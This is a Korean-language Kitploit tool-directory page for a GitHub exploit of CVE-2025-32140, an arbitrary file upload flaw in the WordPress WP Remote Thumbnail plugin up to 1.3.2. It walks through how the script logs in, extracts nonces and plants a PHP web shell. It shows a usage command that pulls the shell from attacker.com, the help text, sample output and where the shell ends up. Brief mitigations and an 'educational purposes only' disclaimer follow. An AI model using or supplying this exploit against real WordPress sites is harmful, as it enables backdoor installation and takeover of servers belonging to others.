Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail 플러그인 <= 1.3.2은 임의 파일 업로드(Arbitrary File Upload) 취약점에 영향을 받습니다. | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-32140
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail 플러그인 <= 1.3.2은 임의 파일 업로드(Arbitrary File Upload) 취약점에 영향을 받습니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2025-32140 – WP Remote Thumbnail 익스플로잇 (임의 파일 업로드)


📝 설명

CVE-2025-32140는 WordPress용 WP Remote Thumbnail 플러그인의 치명적인 취약점입니다. 이 취약점은 검증되지 않은 URL을 허용하는 결함이 있는 기능을 악용하여 인증된 공격자(contributor 이상 권한)가 웹 셸과 같은 임의의 파일을 업로드할 수 있게 합니다.

이 플러그인은 제공된 remote_thumb URL에서 가져온 파일 유형이나 콘텐츠를 검증하지 않습니다. 따라서 공격자는 악성 PHP 파일(예: 백도어)을 /wp-content/uploads 디렉터리에 저장할 수 있습니다.


⚠️ 취약한 구성 요소

  • 플러그인: WP Remote Thumbnail
  • 취약한 버전: <= 1.3.2
  • 패치 버전: 아직 출시되지 않음
  • 공격 벡터: 네트워크
  • 필요한 권한: 낮음 (edit_post 권한이 있는 인증된 사용자)
  • CVSS 점수: 9.9 (치명적)

🛠 익스플로잇 스크립트

이 Python 스크립트는 CVE-2025-32140의 악용을 자동화하며 다음 단계를 수행합니다:

  1. 대상 WordPress 사이트에 로그인합니다.
  2. 필요한 nonce를 자동으로 추출합니다.
  3. remote_thumb 매개변수를 통해 악성 요청을 구성하고 전송합니다.
  4. 대상 사이트에 웹 셸을 업로드합니다.

🔧 명령줄 옵션


🚀 사용법

root@kitploit:~
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 사용법 및 도움말

root@kitploit:~

                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 예제 출력

root@kitploit:~
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 셸 위치

악용에 성공하면 업로드된 웹 셸은 다음 위치에 저장될 가능성이 높습니다:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

YYYY/MM을 업로드한 현재 연도와 월로 바꾸세요.


🛡 권장 사항

이 취약점으로 인한 위험을 완화하려면:

  1. 플러그인을 최신 버전으로 업데이트하세요 (패치가 출시되면).
  2. 파일 업로드 기능을 신뢰할 수 있는 사용자로만 제한하세요.
  3. 필요하지 않다면 원격 썸네일 가져오기 기능을 비활성화하세요.

⚠️ 면책 조항

이 스크립트는 교육 목적으로만 제공됩니다.
저자는 이 익스플로잇으로 인한 오용이나 피해에 대해 책임을 지지 않습니다.


👤 작성자

제작: Nxploited ( Khaled Alenazi ) 🌟

도구 다운로드
옵션별칭설명
--url-u대상 WordPress 사이트 URL (예: http://target.com/wordpress)
--username-un게시물 편집 권한이 있는 WordPress 사용자 이름
--password-p지정된 사용자 이름의 비밀번호
--user_ID-uidWordPress 사용자 ID (보통 관리자는 1)
--post_ID-pid편집할 게시물의 ID (초안 가능)
--shell공격자의 서버에 호스팅된 PHP 웹 셸의 직접 URL